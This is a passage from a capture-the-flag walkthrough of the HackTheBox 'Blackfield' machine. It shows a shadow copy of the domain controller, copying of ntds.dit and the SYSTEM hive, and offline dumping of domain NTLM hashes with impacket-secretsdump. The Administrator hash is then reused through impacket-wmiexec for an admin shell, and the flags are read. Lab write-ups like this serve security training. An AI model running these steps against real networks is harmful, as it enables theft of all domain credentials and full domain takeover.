-> begin backup
-> add volume C: alias cdrive
-> create
Excluding writer "Shadow Copy Optimization Writer", because all of its components have been excluded.
Component "\BCD\BCD" from writer "ASR Writer" is excluded from backup,
because it requires volume which is not in the shadow copy set.
The writer "ASR Writer" is now entirely excluded from the backup because the top-level
non selectable component "\BCD\BCD" is excluded.
* Including writer "Task Scheduler Writer":
+ Adding component: \TasksStore
* Including writer "VSS Metadata Store Writer":
+ Adding component: \WriterMetadataStore
* Including writer "Performance Counters Writer":
+ Adding component: \PerformanceCounters
* Including writer "System Writer":
+ Adding component: \System Files
+ Adding component: \Win32 Services Files
* Including writer "NTDS":
+ Adding component: \C:_Windows_NTDS\ntds
<snipped>
Inserted file DisF0A0.tmp into .cab file meta.cab
Querying all shadow copies with the shadow copy set ID {95596a49-37ff-4fa5-b470-64bd949f4986}
* Shadow copy ID = {73972dbd-d7e7-4eb8-bbaf-ab0ad7cefea3} %cdrive%
- Shadow copy set: {95596a49-37ff-4fa5-b470-64bd949f4986} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 9/10/2025 2:25:38 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent Differential
Number of shadow copies listed: 1
-> expose %cdrive% O:
-> %cdrive% = {73972dbd-d7e7-4eb8-bbaf-ab0ad7cefea3}
The shadow copy was successfully exposed as E:\.
-> end backupThis time it worked.
Now we can use robocopy windows utility, to copy the ntds.dit file from newly created drive O:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> robocopy /b O:\Windows\ntds . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Wednesday, September 10, 2025 2:29:33 PM
Source : O:\Windows\ntds\
Dest : C:\Users\svc_backup\Documents\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 O:\Windows\ntds\
New File 18.0 m ntds.dit
0.0%
0.3%
0.6%
1.0%
100%
------------------------------------------------------------------------------
Total Copied Skipped Mismatch FAILED Extras
Dirs : 1 0 1 0 0 0
Files : 1 1 0 0 0 0
Bytes : 18.00 m 18.00 m 0 0 0 0
Times : 0:00:01 0:00:01 0:00:00 0:00:00
Speed : 12450110 Bytes/sec.
Speed : 712.401 MegaBytes/min.
Ended : Wednesday, September 10, 2025 2:29:34 PMWe will also save the system registry hive to our current working directory:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save hklm\system system
The operation completed successfully.Then download both to our kali vm:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> download system
Info: Downloading C:\Users\svc_backup\Documents\system to system
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc_backup\Documents> download ntds.dit
Info: Downloading C:\Users\svc_backup\Documents\ntds.dit to ntds.dit
Info: Download successful!Using impacket-secretsdump we can dump the hashes:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ impacket-secretsdump -ntds ntds.dit -system system local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:777b3a5045eaccfd325fabcd12450c45:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c1f85538675d6cba8c4307b1d37d0a19:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
<snipped>
[*] Cleaning up...Here we have the domain administrator ntlm hash, which we can use to authenticate, I will use impacket-wmiexec this time:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ impacket-wmiexec blackfield.local/administrator@10.129.229.17 -hashes :184fb5e5178480be64824d4cd53b99ee
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
blackfield\administrator
C:\>hostname
DC01
C:\>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::4d21:4c29:78b9:aa3d
Link-local IPv6 Address . . . . . : fe80::4d21:4c29:78b9:aa3d%17
IPv4 Address. . . . . . . . . . . : 10.129.229.17
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1And we can read the flags:
C:\>type C:\Users\Administrator\Desktop\root.txt
4375a629c7c67c8e29db269060c955cb
C:\>type C:\Users\svc_backup\Desktop\user.txt
3920bb317a0bef51027e2852be64b543Last updated